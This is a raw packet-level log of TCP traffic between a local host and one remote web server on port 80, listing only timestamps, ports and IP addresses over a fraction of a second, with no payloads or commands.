Sep 28, 2024 17:52:13.770929098 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770937920 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770946026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770952940 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770965099 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770978928 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770982027 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.771001101 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.771008015 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.771032095 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.771055937 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787609100 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787626982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787643909 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787663937 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787679911 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787770033 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787792921 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787807941 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787816048 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787825108 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787834883 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787841082 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787851095 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787858009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787864923 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787874937 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787884951 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787889957 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787902117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787905931 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787921906 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787926912 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787939072 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787939072 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.787971020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.787992001 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.819844007 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.819895983 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.819999933 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820014000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820029020 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820040941 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820045948 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820054054 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820071936 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820074081 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820090055 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820103884 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820106030 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820115089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820132971 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820135117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820144892 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820149899 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820167065 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820173025 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820182085 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820183039 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820199966 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820208073 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820216894 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820225000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820240974 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820249081 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820262909 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820276022 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820574045 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820589066 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820605040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820626020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820641041 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820677042 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820692062 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820708990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820723057 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820730925 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820732117 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820748091 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.820753098 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820770025 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.820785999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821619987 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821635962 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821650982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821667910 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821680069 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821692944 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821703911 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821718931 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821734905 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821743965 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821752071 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821759939 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821769953 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821773052 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821787119 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821790934 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821805000 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821824074 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.821974039 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.821990013 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822014093 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822026968 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822031975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822038889 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822060108 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822077990 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822113991 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822134018 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822149992 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822165012 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822171926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822181940 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822185993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822199106 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822213888 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822215080 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822230101 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822243929 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822247028 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.822268963 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.822293043 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823133945 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823157072 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823174000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823189020 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823190928 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823199034 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823205948 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823218107 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823221922 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823234081 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823237896 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823250055 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823255062 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823265076 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823271990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823280096 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823287964 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823297024 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823303938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823319912 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823324919 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823337078 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823344946 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823354006 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.823378086 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.823398113 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824012041 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824028015 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824044943 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824059963 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824062109 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824069023 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824076891 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824089050 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824093103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824107885 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824111938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824119091 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824139118 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824141979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824162960 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824184895 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824389935 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824414015 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824429035 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824438095 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824445963 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824453115 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824460983 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824474096 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824476957 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824491024 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824492931 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824505091 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824510098 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824516058 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824526072 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824537039 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824542999 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824553013 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824565887 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824568987 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824583054 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824584961 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824599981 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824609995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824624062 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824629068 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824640036 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824645042 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824656963 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824665070 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824675083 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824677944 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824691057 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824696064 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824707985 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824716091 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824726105 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.824732065 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824743986 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.824759007 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.858879089 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.858949900 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.858963966 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.858989000 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859009981 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859097958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859113932 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859129906 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859143972 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859155893 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859170914 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859173059 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859185934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859196901 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859201908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859224081 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859247923 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859266996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859282017 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859297037 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859308004 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859313965 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.859328985 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859339952 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.859369040 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876064062 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876163960 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876230001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876245022 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876259089 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876275063 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876285076 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876291990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876307964 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876311064 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876360893 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876379013 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876393080 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876408100 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876424074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876425982 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876447916 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876460075 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876463890 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876481056 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876485109 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876498938 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.876513004 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.876539946 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.917814970 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917834997 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917850018 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917865038 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917881012 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917896986 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917901993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.917913914 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917947054 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.917958975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917973042 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.917975903 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.917994022 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918000937 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918009043 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918018103 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918026924 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918039083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918042898 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918055058 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918060064 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918073893 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918087959 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918103933 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918865919 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918881893 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918899059 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918905973 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918920994 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918921947 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918939114 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918948889 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918955088 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.918979883 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.918987989 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919002056 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919029951 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919301033 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919316053 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919338942 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919361115 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919365883 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919377089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919390917 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919401884 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919435978 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919754028 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919768095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919780970 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919795990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919805050 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919812918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919826031 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919855118 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919905901 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919922113 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919945955 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919954062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919962883 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.919977903 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.919981003 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920002937 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920027971 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920252085 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920269012 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920285940 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920295954 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920306921 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920314074 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920334101 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920335054 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920347929 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920351982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920367956 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920373917 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920384884 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920387983 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920399904 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.920402050 CEST	49730	80	192.168.2.4	84.201.150.223
